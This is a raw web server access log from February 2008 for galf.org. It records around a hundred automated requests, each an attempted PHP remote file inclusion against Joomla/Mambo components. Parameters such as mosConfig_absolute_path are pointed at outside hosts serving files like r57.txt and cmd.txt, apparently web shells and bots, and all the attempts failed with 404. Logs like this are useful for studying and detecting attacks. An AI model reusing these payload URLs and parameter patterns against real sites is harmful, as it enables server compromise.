194.210.19.129 - - [24/Feb/2008:16:38:11 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.210.19.129 - - [24/Feb/2008:16:38:11 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.56.111.194 - - [24/Feb/2008:16:38:54 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.11.14.84 - - [24/Feb/2008:16:39:30 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mahpushane.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
222.239.78.91 - - [24/Feb/2008:16:39:34 -0800] "GET /logs/access.log/index.php?pageurl=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
222.239.78.91 - - [24/Feb/2008:16:39:34 -0800] "GET /index.php?pageurl=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
222.239.78.91 - - [24/Feb/2008:16:39:35 -0800] "GET /logs/index.php?pageurl=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
66.196.43.232 - - [24/Feb/2008:16:40:17 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.196.43.232 - - [24/Feb/2008:16:40:17 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.196.43.232 - - [24/Feb/2008:16:40:17 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.210.19.129 - - [24/Feb/2008:16:40:57 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.19.129 - - [24/Feb/2008:16:40:57 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.19.129 - - [24/Feb/2008:16:40:58 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.235.218 - - [24/Feb/2008:16:41:22 -0800] "GET /logs/index3.php?pageshttp://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
70.84.235.218 - - [24/Feb/2008:16:41:22 -0800] "GET /index3.php?pageshttp://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
66.11.119.180 - - [24/Feb/2008:16:41:34 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.36.35 - - [24/Feb/2008:16:42:53 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://svchost25.site.voila.fr/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
66.132.204.166 - - [24/Feb/2008:16:49:05 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
207.87.60.4 - - [24/Feb/2008:16:49:34 -0800] "GET //components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
213.235.217.202 - - [24/Feb/2008:16:50:13 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.144.55.219 - - [24/Feb/2008:16:50:37 -0800] "GET //components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
80.25.230.39 - - [24/Feb/2008:16:50:54 -0800] "GET /logs/access_071014.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.141.48.120 - - [24/Feb/2008:16:50:58 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.160.11.72 - - [24/Feb/2008:16:51:23 -0800] "GET //components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.17.81.2 - - [24/Feb/2008:16:51:24 -0800] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:16:51:33 -0800] "GET //init_basic.php?GALLERY_BASEDIR=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:16:51:38 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
212.191.68.75 - - [24/Feb/2008:16:51:52 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
190.11.14.84 - - [24/Feb/2008:16:52:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mahpushane.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.111.176.86 - - [24/Feb/2008:16:52:36 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
150.164.211.202 - - [24/Feb/2008:16:52:46 -0800] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.17.81.2 - - [24/Feb/2008:16:53:19 -0800] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
87.237.123.245 - - [24/Feb/2008:16:54:13 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.54.32.131 - - [24/Feb/2008:16:54:15 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kool-wallpapers.com//photos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.17.81.2 - - [24/Feb/2008:16:54:15 -0800] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.135.33.135 - - [24/Feb/2008:16:54:29 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.135.33.135 - - [24/Feb/2008:16:54:29 -0800] "GET //components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.135.33.135 - - [24/Feb/2008:16:54:30 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.135.33.135 - - [24/Feb/2008:16:55:34 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.17.81.2 - - [24/Feb/2008:16:56:55 -0800] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:16:56:55 -0800] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
64.123.108.73 - - [24/Feb/2008:16:57:47 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
124.32.128.178 - - [24/Feb/2008:16:57:55 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.44.121.36 - - [24/Feb/2008:16:58:23 -0800] "GET /logs/access_080114.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.44.121.36 - - [24/Feb/2008:16:58:24 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.44.121.36 - - [24/Feb/2008:16:58:25 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.17.81.2 - - [24/Feb/2008:16:58:46 -0800] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:16:58:48 -0800] "GET //init_basic.php?GALLERY_BASEDIR=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:16:58:49 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
207.87.60.4 - - [24/Feb/2008:16:59:07 -0800] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.98.158.21 - - [24/Feb/2008:16:59:20 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.98.158.21 - - [24/Feb/2008:16:59:20 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.98.158.21 - - [24/Feb/2008:16:59:20 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
207.87.60.4 - - [24/Feb/2008:17:00:33 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
207.87.60.4 - - [24/Feb/2008:17:00:34 -0800] "GET //components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
207.87.60.4 - - [24/Feb/2008:17:00:34 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
69.144.55.219 - - [24/Feb/2008:17:01:17 -0800] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.160.11.72 - - [24/Feb/2008:17:01:27 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.160.11.72 - - [24/Feb/2008:17:01:27 -0800] "GET //components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.160.11.72 - - [24/Feb/2008:17:01:28 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.87.60.4 - - [24/Feb/2008:17:02:01 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.98.158.21 - - [24/Feb/2008:17:02:20 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.158.21 - - [24/Feb/2008:17:02:20 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.158.21 - - [24/Feb/2008:17:02:21 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.91.228.154 - - [24/Feb/2008:17:02:40 -0800] "GET //skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
69.144.55.219 - - [24/Feb/2008:17:03:09 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
69.144.55.219 - - [24/Feb/2008:17:03:09 -0800] "GET //components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
69.144.55.219 - - [24/Feb/2008:17:03:09 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
66.231.214.54 - - [24/Feb/2008:17:03:29 -0800] "GET /logs/access.log//components/com_hashcash/CryptoStrategy.php?mosConfig_absolute_path=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
66.231.214.54 - - [24/Feb/2008:17:03:29 -0800] "GET //components/com_hashcash/CryptoStrategy.php?mosConfig_absolute_path=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
66.231.214.54 - - [24/Feb/2008:17:03:29 -0800] "GET /logs//components/com_hashcash/CryptoStrategy.php?mosConfig_absolute_path=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
69.144.55.219 - - [24/Feb/2008:17:04:44 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.91.228.154 - - [24/Feb/2008:17:05:57 -0800] "GET //skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
66.231.214.54 - - [24/Feb/2008:17:06:26 -0800] "GET /logs/access.log//components/com_hashcash/CryptoStrategy.php?mosConfig_absolute_path=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
67.69.254.243 - - [24/Feb/2008:17:06:27 -0800] "GET //components/com_hashcash/CryptoStrategy.php?mosConfig_absolute_path=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
66.231.214.54 - - [24/Feb/2008:17:06:27 -0800] "GET /logs//components/com_hashcash/CryptoStrategy.php?mosConfig_absolute_path=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
212.191.68.75 - - [24/Feb/2008:17:07:16 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
212.191.68.75 - - [24/Feb/2008:17:07:16 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
212.191.68.75 - - [24/Feb/2008:17:07:16 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
212.191.68.75 - - [24/Feb/2008:17:07:29 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.191.68.75 - - [24/Feb/2008:17:07:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.132.204.166 - - [24/Feb/2008:17:09:14 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.132.204.166 - - [24/Feb/2008:17:09:15 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.132.204.166 - - [24/Feb/2008:17:09:15 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.132.204.166 - - [24/Feb/2008:17:09:21 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.132.204.166 - - [24/Feb/2008:17:09:21 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.205.192 - - [24/Feb/2008:17:09:25 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.17.81.2 - - [24/Feb/2008:17:10:40 -0800] "GET /logs/access.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:17:10:41 -0800] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:17:10:41 -0800] "GET /logs/access.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:17:10:41 -0800] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:17:10:42 -0800] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
83.17.81.2 - - [24/Feb/2008:17:10:42 -0800] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
85.234.144.91 - - [24/Feb/2008:17:10:49 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
85.234.144.91 - - [24/Feb/2008:17:10:49 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.101.240.6 - - [24/Feb/2008:17:10:50 -0800] "GET //skin/zero_vote/error.php?dir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "galf.org"
87.101.240.6 - - [24/Feb/2008:17:10:50 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "galf.org"
87.101.240.8 - - [24/Feb/2008:17:11:11 -0800] "GET //skin/zero_vote/error.php?dir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
87.101.240.7 - - [24/Feb/2008:17:11:12 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
85.234.144.91 - - [24/Feb/2008:17:11:12 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.222.131.65 - - [24/Feb/2008:17:11:43 -0800] "GET /index.php?option=com_htmlarea3_xtd-c&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
77.222.131.65 - - [24/Feb/2008:17:11:43 -0800] "GET /logs/index.php?option=com_htmlarea3_xtd-c&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
193.95.220.30 - - [24/Feb/2008:17:11:47 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
193.95.220.30 - - [24/Feb/2008:17:11:47 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
193.95.220.30 - - [24/Feb/2008:17:11:47 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
193.95.220.30 - - [24/Feb/2008:17:11:58 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
